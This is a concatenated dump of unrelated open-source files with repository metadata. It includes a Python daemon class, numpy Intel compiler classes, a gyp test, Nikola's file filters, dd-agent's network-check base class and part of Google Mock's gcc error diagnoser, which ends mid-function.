file(self.pidfile,'w+').write("%s\n" % pid)
def delpid(self):
os.remove(self.pidfile)
def start(self):
"""
Start the daemon
"""
# Check for a pidfile to see if the daemon already runs
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if pid:
message = "pidfile %s already exists. Daemon already running?\n"
sys.stderr.write(message % self.pidfile)
sys.exit(1)
# Start the daemon
self.daemonize()
self.run()
def stop(self):
"""
Stop the daemon
"""
# Get the pid from the pidfile
try:
pf = file(self.pidfile,'r')
pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
if not pid:
message = "pidfile %s does not exist. Daemon not running?\n"
sys.stderr.write(message % self.pidfile)
return # not an error in a restart
# Try killing the daemon process
try:
while 1:
os.kill(pid, SIGTERM)
time.sleep(0.1)
except OSError, err:
err = str(err)
if err.find("No such process") > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print str(err)
sys.exit(1)
def restart(self):
"""
Restart the daemon
"""
self.stop()
self.start()
def run(self):
"""
You should override this method when you subclass Daemon. It will be called after the process has been
daemonized by start() or restart().
"""
|
apache-2.0
|
JRock007/boxxy
|
dist/Boxxy server.app/Contents/Resources/lib/python2.7/numpy/distutils/intelccompiler.py
|
59
|
1775
|
from __future__ import division, absolute_import, print_function
from distutils.unixccompiler import UnixCCompiler
from numpy.distutils.exec_command import find_executable
class IntelCCompiler(UnixCCompiler):
""" A modified Intel compiler compatible with an gcc built Python."""
compiler_type = 'intel'
cc_exe = 'icc'
cc_args = 'fPIC'
def __init__(self, verbose=0, dry_run=0, force=0):
UnixCCompiler.__init__(self, verbose, dry_run, force)
self.cc_exe = 'icc -fPIC'
compiler = self.cc_exe
self.set_executables(compiler=compiler,
compiler_so=compiler,
compiler_cxx=compiler,
linker_exe=compiler,
linker_so=compiler + ' -shared')
class IntelItaniumCCompiler(IntelCCompiler):
compiler_type = 'intele'
# On Itanium, the Intel Compiler used to be called ecc, let's search for
# it (now it's also icc, so ecc is last in the search).
for cc_exe in map(find_executable, ['icc', 'ecc']):
if cc_exe:
break
class IntelEM64TCCompiler(UnixCCompiler):
""" A modified Intel x86_64 compiler compatible with a 64bit gcc built Python.
"""
compiler_type = 'intelem'
cc_exe = 'icc -m64 -fPIC'
cc_args = "-fPIC"
def __init__(self, verbose=0, dry_run=0, force=0):
UnixCCompiler.__init__(self, verbose, dry_run, force)
self.cc_exe = 'icc -m64 -fPIC'
compiler = self.cc_exe
self.set_executables(compiler=compiler,
compiler_so=compiler,
compiler_cxx=compiler,
linker_exe=compiler,
linker_so=compiler + ' -shared')
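# Usage sketch: distutils selects these classes by their compiler_type, e.g.
#
#     python setup.py build --compiler=intelem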
|
mit
|
mcanthony/rethinkdb
|
external/v8_3.30.33.16/build/gyp/test/mac/gyptest-objc-gc.py
|
90
|
1377
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that GC objc settings are handled correctly.
"""
import TestGyp
import sys
if sys.platform == 'darwin':
# set |match| to ignore build stderr output.
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'],
match = lambda a, b: True)
CHDIR = 'objc-gc'
test.run_gyp('test.gyp', chdir=CHDIR)
build_error_code = {
'xcode': [1, 65], # 1 for xcode 3, 65 for xcode 4 (see `man sysexits`)
'make': 2,
'ninja': 1,
}[test.format]
test.build('test.gyp', 'gc_exe_fails', chdir=CHDIR, status=build_error_code)
test.build(
'test.gyp', 'gc_off_exe_req_lib', chdir=CHDIR, status=build_error_code)
test.build('test.gyp', 'gc_req_exe', chdir=CHDIR)
test.run_built_executable('gc_req_exe', chdir=CHDIR, stdout="gc on: 1\n")
test.build('test.gyp', 'gc_exe_req_lib', chdir=CHDIR)
test.run_built_executable('gc_exe_req_lib', chdir=CHDIR, stdout="gc on: 1\n")
test.build('test.gyp', 'gc_exe', chdir=CHDIR)
test.run_built_executable('gc_exe', chdir=CHDIR, stdout="gc on: 1\n")
test.build('test.gyp', 'gc_off_exe', chdir=CHDIR)
test.run_built_executable('gc_off_exe', chdir=CHDIR, stdout="gc on: 0\n")
test.pass_test()
|
agpl-3.0
|
JingJunYin/tensorflow
|
tensorflow/contrib/saved_model/__init__.py
|
109
|
1411
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""SavedModel contrib support.
SavedModel provides a language-neutral format to save machine-learned models
that is recoverable and hermetic. It enables higher-level systems and tools to
produce, consume and transform TensorFlow models.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import,line-too-long
from tensorflow.contrib.saved_model.python.saved_model.signature_def_utils import *
# pylint: enable=unused-import,wildcard-import,line-too-long
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = ["get_signature_def_by_key"]
remove_undocumented(__name__, _allowed_symbols)
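# Usage sketch (assuming a MetaGraphDef loaded from a SavedModel):
#
#     from tensorflow.contrib import saved_model
#     sig = saved_model.get_signature_def_by_key(meta_graph_def,
#                                                "serving_default")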
|
apache-2.0
|
immanetize/nikola
|
nikola/filters.py
|
1
|
7187
|
# -*- coding: utf-8 -*-
# Copyright © 2012-2015 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Utility functions to help you run filters on files."""
from .utils import req_missing
from functools import wraps
import os
import io
import shutil
import subprocess
import tempfile
import shlex
try:
import typogrify.filters as typo
except ImportError:
typo = None # NOQA
def apply_to_binary_file(f):
"""Take a function f that transforms a data argument, and returns
a function that takes a filename and applies f to the contents,
in place. Reads files in binary mode."""
@wraps(f)
def f_in_file(fname):
with open(fname, 'rb') as inf:
data = inf.read()
data = f(data)
with open(fname, 'wb+') as outf:
outf.write(data)
return f_in_file
def apply_to_text_file(f):
"""Take a function f that transforms a data argument, and returns
a function that takes a filename and applies f to the contents,
in place. Reads files in UTF-8."""
@wraps(f)
def f_in_file(fname):
with io.open(fname, 'r', encoding='utf-8') as inf:
data = inf.read()
data = f(data)
with io.open(fname, 'w+', encoding='utf-8') as outf:
outf.write(data)
return f_in_file
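# Usage sketch: wrap any str -> str transform so it runs on a file in place.
#
#     @apply_to_text_file
#     def upper_case(data):
#         return data.upper()
#
#     upper_case('output/index.html')  # rewrites the file in UTF-8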
def list_replace(the_list, find, replacement):
"Replace all occurrences of ``find`` with ``replacement`` in ``the_list``"
for i, v in enumerate(the_list):
if v == find:
the_list[i] = replacement
def runinplace(command, infile):
"""Run a command in-place on a file.
command is a string of the form: "commandname %1 %2" and
it will be execed with infile as %1 and a temporary file
as %2. Then, that temporary file will be moved over %1.
Example usage:
runinplace("yui-compressor %1 -o %2", "myfile.css")
That will replace myfile.css with a minified version.
You can also supply command as a list.
"""
if not isinstance(command, list):
command = shlex.split(command)
tmpdir = None
if "%2" in command:
tmpdir = tempfile.mkdtemp(prefix="nikola")
tmpfname = os.path.join(tmpdir, os.path.basename(infile))
try:
list_replace(command, "%1", infile)
if tmpdir:
list_replace(command, "%2", tmpfname)
subprocess.check_call(command)
if tmpdir:
shutil.move(tmpfname, infile)
finally:
if tmpdir:
shutil.rmtree(tmpdir)
def yui_compressor(infile):
yuicompressor = False
try:
subprocess.call('yui-compressor', stdout=open(os.devnull, 'w'), stderr=open(os.devnull, 'w'))
yuicompressor = 'yui-compressor'
except Exception:
pass
if not yuicompressor:
try:
subprocess.call('yuicompressor', stdout=open(os.devnull, 'w'), stderr=open(os.devnull, 'w'))
yuicompressor = 'yuicompressor'
except Exception:
raise Exception("yui-compressor is not installed.")
return runinplace(r'{} --nomunge %1 -o %2'.format(yuicompressor), infile)
def closure_compiler(infile):
return runinplace(r'closure-compiler --warning_level QUIET --js %1 --js_output_file %2', infile)
def optipng(infile):
return runinplace(r"optipng -preserve -o2 -quiet %1", infile)
def jpegoptim(infile):
return runinplace(r"jpegoptim -p --strip-all -q %1", infile)
def html_tidy_nowrap(infile):
return _html_tidy_runner(infile, r"-quiet --show-info no --show-warnings no -utf8 -indent --indent-attributes no --sort-attributes alpha --wrap 0 --wrap-sections no --tidy-mark no -modify %1")
def html_tidy_wrap(infile):
return _html_tidy_runner(infile, r"-quiet --show-info no --show-warnings no -utf8 -indent --indent-attributes no --sort-attributes alpha --wrap 80 --wrap-sections no --tidy-mark no -modify %1")
def html_tidy_wrap_attr(infile):
return _html_tidy_runner(infile, r"-quiet --show-info no --show-warnings no -utf8 -indent --indent-attributes yes --sort-attributes alpha --wrap 80 --wrap-sections no --tidy-mark no -modify %1")
def html_tidy_mini(infile):
return _html_tidy_runner(infile, r"-quiet --show-info no --show-warnings no -utf8 --indent-attributes no --sort-attributes alpha --wrap 0 --wrap-sections no --tidy-mark no -modify %1")
def _html_tidy_runner(infile, options):
""" Warnings (returncode 1) are not critical, and *everything* is a warning """
try:
status = runinplace(r"tidy5 " + options, infile)
except subprocess.CalledProcessError as err:
status = 0 if err.returncode == 1 else err.returncode
return status
@apply_to_text_file
def minify_lines(data):
return data
@apply_to_text_file
def typogrify(data):
if typo is None:
req_missing(['typogrify'], 'use the typogrify filter')
data = typo.amp(data)
data = typo.widont(data)
data = typo.smartypants(data)
# Disabled because of typogrify bug where it breaks <title>
# data = typo.caps(data)
data = typo.initial_quotes(data)
return data
@apply_to_text_file
def typogrify_sans_widont(data):
# typogrify with widont disabled because it caused broken headline
# wrapping, see issue #1465
if typo is None:
req_missing(['typogrify'], 'use the typogrify_sans_widont filter')
data = typo.amp(data)
data = typo.smartypants(data)
# Disabled because of typogrify bug where it breaks <title>
# data = typo.caps(data)
data = typo.initial_quotes(data)
return data
@apply_to_text_file
def php_template_injection(data):
import re
    template = re.search('<!-- __NIKOLA_PHP_TEMPLATE_INJECTION source:(.*) checksum:(.*)__ -->', data)
if template:
source = template.group(1)
with io.open(source, "r", encoding="utf-8") as in_file:
phpdata = in_file.read()
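        # Split off the metadata header (everything up to the first blank
        # line) and keep only the PHP template body, whatever the newline
        # convention of the file.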
_META_SEPARATOR = '(' + os.linesep * 2 + '|' + ('\n' * 2) + '|' + ("\r\n" * 2) + ')'
phpdata = re.split(_META_SEPARATOR, phpdata, maxsplit=1)[-1]
phpdata = re.sub(template.group(0), phpdata, data)
return phpdata
else:
return data
|
mit
|
lym/allura-git
|
Allura/allura/tests/unit/test_post_model.py
|
2
|
2070
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from pylons import tmpl_context as c
from allura.lib import helpers as h
from allura import model as M
from allura.tests.unit import WithDatabase
from allura.tests.unit import patches
from allura.tests.unit.factories import create_post
class TestPostModel(WithDatabase):
patches = [patches.fake_app_patch,
patches.disable_notifications_patch]
def setUp(self):
super(TestPostModel, self).setUp()
self.post = create_post('mypost')
def test_that_it_is_pending_by_default(self):
assert self.post.status == 'pending'
def test_that_it_can_be_approved(self):
with h.push_config(c, user=M.User()):
self.post.approve()
assert self.post.status == 'ok'
def test_activity_extras(self):
self.post.text = """\
This is a **bold thing**, 40 chars here.
* Here's the first item in our list.
* And here's the second item."""
assert 'allura_id' in self.post.activity_extras
summary = self.post.activity_extras['summary']
assert summary == "This is a bold thing, 40 chars here. " + \
"Here's the first item in our list. " + \
"And here's..."
|
apache-2.0
|
zendesk/dd-agent
|
checks/network_checks.py
|
26
|
8048
|
# stdlib
from collections import defaultdict
from Queue import Empty, Queue
import threading
import time
# project
from checks import AgentCheck
from checks.libs.thread_pool import Pool
from config import _is_affirmative
TIMEOUT = 180
DEFAULT_SIZE_POOL = 6
MAX_LOOP_ITERATIONS = 1000
FAILURE = "FAILURE"
class Status:
DOWN = "DOWN"
WARNING = "WARNING"
UP = "UP"
class EventType:
DOWN = "servicecheck.state_change.down"
UP = "servicecheck.state_change.up"
class NetworkCheck(AgentCheck):
SOURCE_TYPE_NAME = 'servicecheck'
SERVICE_CHECK_PREFIX = 'network_check'
STATUS_TO_SERVICE_CHECK = {
Status.UP : AgentCheck.OK,
Status.WARNING : AgentCheck.WARNING,
Status.DOWN : AgentCheck.CRITICAL
}
"""
    Service checks inherit from this class.
    This class should never be instantiated directly.
    Workflow:
    The main agent loop will call the check function for each instance for
    each iteration of the loop.
    The check method will make an asynchronous call to the _process method in
    one of the threads initiated in the thread pool created in this class's
    constructor.
    The _process method will call the _check method of the inherited class,
    which will perform the actual check.
    The _check method must return a tuple whose first element is either
    Status.UP or Status.DOWN.
    The second element is a short error message that will be displayed
    when the service goes down.
    (An illustrative subclass sketch appears at the end of this file.)
"""
def __init__(self, name, init_config, agentConfig, instances):
AgentCheck.__init__(self, name, init_config, agentConfig, instances)
# A dictionary to keep track of service statuses
self.statuses = {}
self.notified = {}
self.nb_failures = 0
self.pool_started = False
# Make sure every instance has a name that we use as a unique key
# to keep track of statuses
names = []
for inst in instances:
if 'name' not in inst:
raise Exception("All instances should have a 'name' parameter,"
" error on instance: {0}".format(inst))
            if inst['name'] in names:
                raise Exception("Duplicate names for instances with name {0}"
                                .format(inst['name']))
            names.append(inst['name'])
def stop(self):
self.stop_pool()
self.pool_started = False
def start_pool(self):
# The pool size should be the minimum between the number of instances
# and the DEFAULT_SIZE_POOL. It can also be overridden by the 'threads_count'
# parameter in the init_config of the check
self.log.info("Starting Thread Pool")
default_size = min(self.instance_count(), DEFAULT_SIZE_POOL)
self.pool_size = int(self.init_config.get('threads_count', default_size))
self.pool = Pool(self.pool_size)
self.resultsq = Queue()
self.jobs_status = {}
self.pool_started = True
def stop_pool(self):
self.log.info("Stopping Thread Pool")
if self.pool_started:
self.pool.terminate()
self.pool.join()
self.jobs_status.clear()
assert self.pool.get_nworkers() == 0
def restart_pool(self):
self.stop_pool()
self.start_pool()
def check(self, instance):
if not self.pool_started:
self.start_pool()
if threading.activeCount() > 5 * self.pool_size + 5: # On Windows the agent runs on multiple threads so we need to have an offset of 5 in case the pool_size is 1
raise Exception("Thread number (%s) is exploding. Skipping this check" % threading.activeCount())
self._process_results()
self._clean()
name = instance.get('name', None)
if name is None:
self.log.error('Each service check must have a name')
return
if name not in self.jobs_status:
# A given instance should be processed one at a time
self.jobs_status[name] = time.time()
self.pool.apply_async(self._process, args=(instance,))
else:
self.log.error("Instance: %s skipped because it's already running." % name)
def _process(self, instance):
try:
statuses = self._check(instance)
if isinstance(statuses, tuple):
# Assume the check only returns one service check
status, msg = statuses
self.resultsq.put((status, msg, None, instance))
elif isinstance(statuses, list):
for status in statuses:
sc_name, status, msg = status
self.resultsq.put((status, msg, sc_name, instance))
except Exception:
result = (FAILURE, FAILURE, FAILURE, FAILURE)
self.resultsq.put(result)
def _process_results(self):
for i in range(MAX_LOOP_ITERATIONS):
try:
                # We want to fetch the results in a non-blocking way
status, msg, sc_name, instance = self.resultsq.get_nowait()
except Empty:
break
if status == FAILURE:
self.nb_failures += 1
if self.nb_failures >= self.pool_size - 1:
self.nb_failures = 0
self.restart_pool()
continue
self.report_as_service_check(sc_name, status, instance, msg)
# FIXME: 5.3, this has been deprecated before, get rid of events
# Don't create any event to avoid duplicates with server side
# service_checks
skip_event = _is_affirmative(instance.get('skip_event', False))
instance_name = instance['name']
if not skip_event:
self.warning("Using events for service checks is deprecated in favor of monitors and will be removed in future versions of the Datadog Agent.")
event = None
if instance_name not in self.statuses:
self.statuses[instance_name] = defaultdict(list)
self.statuses[instance_name][sc_name].append(status)
window = int(instance.get('window', 1))
if window > 256:
self.log.warning("Maximum window size (256) exceeded, defaulting it to 256")
window = 256
threshold = instance.get('threshold', 1)
if len(self.statuses[instance_name][sc_name]) > window:
self.statuses[instance_name][sc_name].pop(0)
nb_failures = self.statuses[instance_name][sc_name].count(Status.DOWN)
if nb_failures >= threshold:
if self.notified.get((instance_name, sc_name), Status.UP) != Status.DOWN:
event = self._create_status_event(sc_name, status, msg, instance)
self.notified[(instance_name, sc_name)] = Status.DOWN
else:
if self.notified.get((instance_name, sc_name), Status.UP) != Status.UP:
event = self._create_status_event(sc_name, status, msg, instance)
self.notified[(instance_name, sc_name)] = Status.UP
if event is not None:
self.events.append(event)
            # The job is finished here; this instance can be re-processed
if instance_name in self.jobs_status:
del self.jobs_status[instance_name]
def _check(self, instance):
"""This function should be implemented by inherited classes"""
raise NotImplementedError
def _clean(self):
now = time.time()
for name in self.jobs_status.keys():
start_time = self.jobs_status[name]
if now - start_time > TIMEOUT:
self.log.critical("Restarting Pool. One check is stuck: %s" % name)
self.restart_pool()
break
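# Illustrative sketch (not part of dd-agent): a minimal subclass showing the
# contract described in the NetworkCheck docstring. The class name and the
# 'url' instance parameter are made up for this example.
class ExampleHTTPCheck(NetworkCheck):
    def _check(self, instance):
        import urllib2  # stdlib on the Python 2 runtime this agent targets
        try:
            urllib2.urlopen(instance['url'], timeout=10)
            # The first element must be Status.UP or Status.DOWN; the
            # second is the message reported when the service goes down.
            return Status.UP, "OK"
        except Exception as e:
            return Status.DOWN, str(e)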
|
bsd-3-clause
|
damdam-s/hr
|
__unported__/hr_resume/__init__.py
|
28
|
1047
|
# -*- encoding: utf-8 -*-
###############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 Savoir-faire Linux (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from . import hr_resume
from . import report
|
agpl-3.0
|
tectronics/omaha
|
third_party/gmock/scripts/gmock_doctor.py
|
64
|
17418
|
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Converts gcc errors in code using Google Mock to plain English."""
__author__ = 'wan@google.com (Zhanyong Wan)'
import re
import sys
_VERSION = '1.0.3'
_COMMON_GMOCK_SYMBOLS = [
# Matchers
'_',
'A',
'AddressSatisfies',
'AllOf',
'An',
'AnyOf',
'ContainerEq',
'Contains',
'ContainsRegex',
'DoubleEq',
'ElementsAre',
'ElementsAreArray',
'EndsWith',
'Eq',
'Field',
'FloatEq',
'Ge',
'Gt',
'HasSubstr',
'IsInitializedProto',
'Le',
'Lt',
'MatcherCast',
'Matches',
'MatchesRegex',
'NanSensitiveDoubleEq',
'NanSensitiveFloatEq',
'Ne',
'Not',
'NotNull',
'Pointee',
'Property',
'Ref',
'ResultOf',
'SafeMatcherCast',
'StartsWith',
'StrCaseEq',
'StrCaseNe',
'StrEq',
'StrNe',
'Truly',
'TypedEq',
'Value',
# Actions
'Assign',
'ByRef',
'DeleteArg',
'DoAll',
'DoDefault',
'IgnoreResult',
'Invoke',
'InvokeArgument',
'InvokeWithoutArgs',
'Return',
'ReturnNew',
'ReturnNull',
'ReturnRef',
'SaveArg',
'SetArgReferee',
'SetArgumentPointee',
'SetArrayArgument',
'SetErrnoAndReturn',
'Throw',
'WithArg',
'WithArgs',
'WithoutArgs',
# Cardinalities
'AnyNumber',
'AtLeast',
'AtMost',
'Between',
'Exactly',
# Sequences
'InSequence',
'Sequence',
# Misc
'DefaultValue',
'Mock',
]
# Regex for matching source file path and line number in gcc's errors.
_FILE_LINE_RE = r'(?P<file>.*):(?P<line>\d+):\s+'
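# For example, 'foo/bar.cc:123: error: ...' yields file='foo/bar.cc'
# and line='123'.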
def _FindAllMatches(regex, s):
"""Generates all matches of regex in string s."""
r = re.compile(regex)
return r.finditer(s)
def _GenericDiagnoser(short_name, long_name, regex, diagnosis, msg):
"""Diagnoses the given disease by pattern matching.
Args:
short_name: Short name of the disease.
long_name: Long name of the disease.
regex: Regex for matching the symptoms.
diagnosis: Pattern for formatting the diagnosis.
msg: Gcc's error messages.
Yields:
Tuples of the form
(short name of disease, long name of disease, diagnosis).
"""
diagnosis = '%(file)s:%(line)s:' + diagnosis
for m in _FindAllMatches(regex, msg):
yield (short_name, long_name, diagnosis % m.groupdict())
def _NeedToReturnReferenceDiagnoser(msg):
"""Diagnoses the NRR disease, given the error messages by gcc."""
regex = (r'In member function \'testing::internal::ReturnAction<R>.*\n'
+ _FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: creating array with negative size')
diagnosis = """
You are using a Return() action in a function that returns a reference.
Please use ReturnRef() instead."""
return _GenericDiagnoser('NRR', 'Need to Return Reference',
regex, diagnosis, msg)
def _NeedToReturnSomethingDiagnoser(msg):
"""Diagnoses the NRS disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE +
r'(instantiated from here\n.'
r'*gmock.*actions\.h.*error: void value not ignored)'
r'|(error: control reaches end of non-void function)')
diagnosis = """
You are using an action that returns void, but it needs to return
*something*. Please tell it *what* to return. Perhaps you can use
the pattern DoAll(some_action, Return(some_value))?"""
return _GenericDiagnoser('NRS', 'Need to Return Something',
regex, diagnosis, msg)
def _NeedToReturnNothingDiagnoser(msg):
"""Diagnoses the NRN disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-actions\.h.*error: instantiation of '
r'\'testing::internal::ReturnAction<R>::Impl<F>::value_\' '
r'as type \'void\'')
diagnosis = """
You are using an action that returns *something*, but it needs to return
void. Please use a void-returning action instead.
All actions but the last in DoAll(...) must return void. Perhaps you need
to re-arrange the order of actions in a DoAll(), if you are using one?"""
return _GenericDiagnoser('NRN', 'Need to Return Nothing',
regex, diagnosis, msg)
def _IncompleteByReferenceArgumentDiagnoser(msg):
"""Diagnoses the IBRA disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'instantiated from here\n'
r'.*gmock-printers\.h.*error: invalid application of '
r'\'sizeof\' to incomplete type \'(?P<type>.*)\'')
diagnosis = """
In order to mock this function, Google Mock needs to see the definition
of type "%(type)s" - declaration alone is not enough. Either #include
the header that defines it, or change the argument to be passed
by pointer."""
return _GenericDiagnoser('IBRA', 'Incomplete By-Reference Argument Type',
regex, diagnosis, msg)
def _OverloadedFunctionMatcherDiagnoser(msg):
"""Diagnoses the OFM disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Truly\(<unresolved overloaded function type>\)')
diagnosis = """
The argument you gave to Truly() is an overloaded function. Please tell
gcc which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool Foo(int n);
you should write
Truly(static_cast<bool (*)(int n)>(Foo))"""
return _GenericDiagnoser('OFM', 'Overloaded Function Matcher',
regex, diagnosis, msg)
def _OverloadedFunctionActionDiagnoser(msg):
"""Diagnoses the OFA disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: no matching function for call to \'Invoke\('
r'<unresolved overloaded function type>')
diagnosis = """
You are passing an overloaded function to Invoke(). Please tell gcc
which overloaded version you want to use.
For example, if you want to use the version whose signature is
bool MyFunction(int n, double x);
you should write something like
Invoke(static_cast<bool (*)(int n, double x)>(MyFunction))"""
return _GenericDiagnoser('OFA', 'Overloaded Function Action',
regex, diagnosis, msg)
def _OverloadedMethodActionDiagnoser1(msg):
"""Diagnoses the OMA disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: '
r'.*no matching function for call to \'Invoke\(.*, '
r'unresolved overloaded function type>')
diagnosis = """
The second argument you gave to Invoke() is an overloaded method. Please
tell gcc which overloaded version you want to use.
For example, if you want to use the version whose signature is
class Foo {
...
bool Bar(int n, double x);
};
you should write something like
Invoke(foo, static_cast<bool (Foo::*)(int n, double x)>(&Foo::Bar))"""
return _GenericDiagnoser('OMA', 'Overloaded Method Action',
regex, diagnosis, msg)
def _MockObjectPointerDiagnoser(msg):
"""Diagnoses the MOP disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: request for member '
r'\'gmock_(?P<method>.+)\' in \'(?P<mock_object>.+)\', '
r'which is of non-class type \'(.*::)*(?P<class_name>.+)\*\'')
diagnosis = """
The first argument to ON_CALL() and EXPECT_CALL() must be a mock *object*,
not a *pointer* to it. Please write '*(%(mock_object)s)' instead of
'%(mock_object)s' as your first argument.
For example, given the mock class:
class %(class_name)s : public ... {
...
MOCK_METHOD0(%(method)s, ...);
};
and the following mock instance:
%(class_name)s* mock_ptr = ...
you should use the EXPECT_CALL like this:
EXPECT_CALL(*mock_ptr, %(method)s(...));"""
return _GenericDiagnoser('MOP', 'Mock Object Pointer',
regex, diagnosis, msg)
def _OverloadedMethodActionDiagnoser2(msg):
"""Diagnoses the OMA disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: no matching function for '
r'call to \'Invoke\(.+, <unresolved overloaded function type>\)')
diagnosis = """
The second argument you gave to Invoke() is an overloaded method. Please
tell gcc which overloaded version you want to use.
For example, if you want to use the version whose signature is
class Foo {
...
bool Bar(int n, double x);
};
you should write something like
Invoke(foo, static_cast<bool (Foo::*)(int n, double x)>(&Foo::Bar))"""
return _GenericDiagnoser('OMA', 'Overloaded Method Action',
regex, diagnosis, msg)
def _NeedToUseSymbolDiagnoser(msg):
"""Diagnoses the NUS disease, given the error messages by gcc."""
regex = (_FILE_LINE_RE + r'error: \'(?P<symbol>.+)\' '
r'(was not declared in this scope|has not been declared)')
diagnosis = """
'%(symbol)s' is defined by Google Mock in the testing namespace.
Did you forget to write
using testing::%(symbol)s;
?"""
for m in _FindAllMatches(regex, msg):
symbol = m.groupdict()['symbol']
if symbol in _COMMON_GMOCK_SYMBOLS:
yield ('NUS', 'Need to Use Symbol', diagnosis % m.groupdict())
def _NeedToUseReturnNullDiagnoser(msg):
"""Diagnoses the NRNULL disease, given the error messages by gcc."""
regex = ('instantiated from \'testing::internal::ReturnAction<R>'
'::operator testing::Action<Func>\(\) const.*\n' +
_FILE_LINE_RE + r'instantiated from here\n'
r'.*error: no matching function for call to \'implicit_cast\('
r'long int&\)')
diagnosis = """
You are probably calling Return(NULL) and the compiler isn't sure how to turn
NULL into the right type. Use ReturnNull() instead.
Note: the line number may be off; please fix all instances of Return(NULL)."""
return _GenericDiagnoser('NRNULL', 'Need to use ReturnNull',
regex, diagnosis, msg)
_TTB_DIAGNOSIS = """
In a mock class template, types or typedefs defined in the base class
template are *not* automatically visible. This is how C++ works. Before
you can use a type or typedef named %(type)s defined in base class Base<T>, you
need to make it visible. One way to do it is:
typedef typename Base<T>::%(type)s %(type)s;"""
def _TypeInTemplatedBaseDiagnoser1(msg):
"""Diagnoses the TTB disease, given the error messages by gcc.
